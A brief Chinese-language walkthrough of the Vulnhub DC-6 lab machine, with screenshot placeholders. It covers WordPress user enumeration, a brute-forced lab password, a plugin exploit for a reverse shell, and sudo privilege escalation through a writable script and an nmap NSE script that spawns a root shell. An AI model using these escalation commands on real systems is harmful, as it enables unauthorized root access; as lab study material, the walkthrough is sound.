Vulnhub DC-6

nmap 扫描服务

Vulnhub DC-6_第1张图片

修改 hosts 文件

Vulnhub DC-6_第2张图片

发现是 wordpress wpscan --url http://wordy/ --enumerate u 查看wordpress用户

Vulnhub DC-6_第3张图片

爆破得密码 mark:helpdesk01

发现 active monitor 插件

Vulnhub DC-6_第4张图片

搜索 exp ,反弹 shell

Vulnhub DC-6_第5张图片

发现用户名密码

Vulnhub DC-6_第6张图片

python -c 'import pty;pty.spawn("/bin/bash")' 转换成 pty

sudo -l 发现 jens 命令

echo /bin/sh > /home/jens/backups.sh

sudo -u jens /home/jens/backups.sh

Vulnhub DC-6_第7张图片

nmap的版本在2.02-5.21之间,这样可以直接使用nmap的交互模式提权

echo 'os.execute("/bin/sh")' > /tmp/rootshell.nse

sudo nmap --script=/tmp/rootshell.nse

Vulnhub DC-6_第8张图片

你可能感兴趣的:(Web)